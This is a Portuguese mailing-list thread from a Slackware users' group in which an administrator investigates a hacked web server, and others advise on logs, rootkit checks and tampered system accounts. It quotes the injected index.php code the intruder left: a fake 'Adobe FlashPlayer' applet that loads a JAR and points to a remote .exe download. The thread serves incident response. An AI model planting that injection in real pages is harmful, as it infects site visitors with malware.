relamente o 777 nas pastas com arquivos visíveis na web, são falhas de segurança =)
Acho crucial em um momento como estes, verificar os usuários do sistema. Verifica se nenhum usuário foi criado. Quando invadiram um servidor testes q eu tinha (não havia nada dentro dele era teste mesmo), adicionaram e modificaram os usuários chamados *proxy*, * ssh*, *ftp, system *etc... ex. o usuário ftp já existe no passwd porém, sem acesso a shell o cara deu acesso a shell ao usuário ftp e ainda colocou ele com uid administrativa =) não me prejudicou em nada pelo servidor ser somente e exclusivamente de testes. Mas haviam mais de 500 emails enviados pelo sendmail (acham q eu ia deixar sendmail configurado?) alteração no index principal do apache e ainda adicionou um vhost :S (Cara mau! pq não me pediu espaço?) Lembrando que a máquina nem firewall tinha. Era espetada na rede e pronto. outras tantas besteirinhas aconteceram mas foi legal a experiência pois bem fica atento e faz uma faxina no teu server ai. 2009/8/11 Jorge Filho <[email protected]> > Olá pessoal, obrigado pelas ajudas. > O que eu consegui rastrear até agora foi o seguinte, o cara conseguiu > editar o index.php do site e colocou o seguinte applet: > > <applet name="Adobe FlashPlayer" code="Inicio.class" archive=" > http://www.exemplo.com/audio/FlashPlayer.jar" height="10" width="1"> > <param name="url" value=" > http://merlincosmeticos.com.br/cache/foto125.exe"> > </applet> > > Ele também adicionou esse FlashPlayer.jar no diretório audio do servidor, e > tinha também esse arquivo asd.html na raiz. > As datas dos arquivos são: > > -rw------- 1 www-data www-data 9,8K 2009-08-10 22:53 FlashPlayer.jar > -r-xr-xr-x 1 www-data www-data 12K 2009-08-11 14:03 index.php > > No logo do /var/log/apache/access.log está o seguinte: > > 201.78.54.160 - - [10/Aug/2009:15:03:17 -0300] "GET /asd.html HTTP/1.1" 200 > 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) > Gecko/2009073022 Firefox/3.0.13" > 189.26.198.238 - - [10/Aug/2009:15:07:01 -0300] "GET /asd.html HTTP/1.1" > 200 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 189.26.198.238 - - [10/Aug/2009:15:07:39 -0300] "GET /asd.html HTTP/1.1" > 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 189.26.198.238 - - [10/Aug/2009:15:09:43 -0300] "GET /asd.html HTTP/1.1" > 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 201.89.53.126 - - [10/Aug/2009:15:48:12 -0300] "GET /asd.html HTTP/1.1" 200 > 808 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; > SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618)" > > Se procurar FlashPlayer.jar no log então, acha muito, porque muita gente > deve ter baixado. > > Outra coisa que acho que pode ser uma falha na segurança também é que todos > os arquivos estavam com permissão 777 > > Sobre o ftp, tem alguns usuários com senha fraca sim, mais o ftp roda em > chroot com autenticação mysql, o usuário já cai na pasta sem ter como sair, > acho dificil ter acontecido algo pelo ftp, mas claro, nada é impossível. > > Vou analisar mais coisas aqui, mas to meio confuso, é a primeira vez que > tenho um ataque no servidor, situação estranha, mais agora tenho que > aprender como o cara fez isso pra consertar o que tá errado. > > > 2009/8/11 Herbert Faleiros <[email protected]> > > >> On Tue 11 Aug 2009 18:19:12 Jorge Filho wrote: >> > Hoje aconteceu algo muito estranho no meu server web, de manhã, quando >> > alguém entrava no site aparecia uma tela pedindo pra executar um >> > javascript. Qual não foi minha surpresa quando vi um arquivo diferente >> na >> > raiz do meu site, com nome de asd.html? >> > >> > Com é possível isso ter acontecido? Que tipo de configuração eu devo >> > verificar se tem problema? Fiquei sem saber o que fazer. >> >> >> examine seus logs, com certeza vai encontrar mais informações... Verifique >> os >> softwares em execução e procure atualizações de segurança. Execute >> ferramentas >> p/ buscar por rootkits e exploits e verifique quem tem mais acesso ao seu >> sistema (tá com cara de que isso foi "manual"). >> >> -- >> Herbert >> >> >> >> > > > > -- kram3r --~--~---------~--~----~------------~-------~--~----~ GUS-BR - Grupo de Usuários de Slackware Brasil http://www.slackwarebrasil.org/ http://groups.google.com/group/slack-users-br Antes de perguntar: http://www.istf.com.br/perguntas/ Para sair da lista envie um e-mail para: [email protected] -~----------~----~----~----~------~----~------~--~---

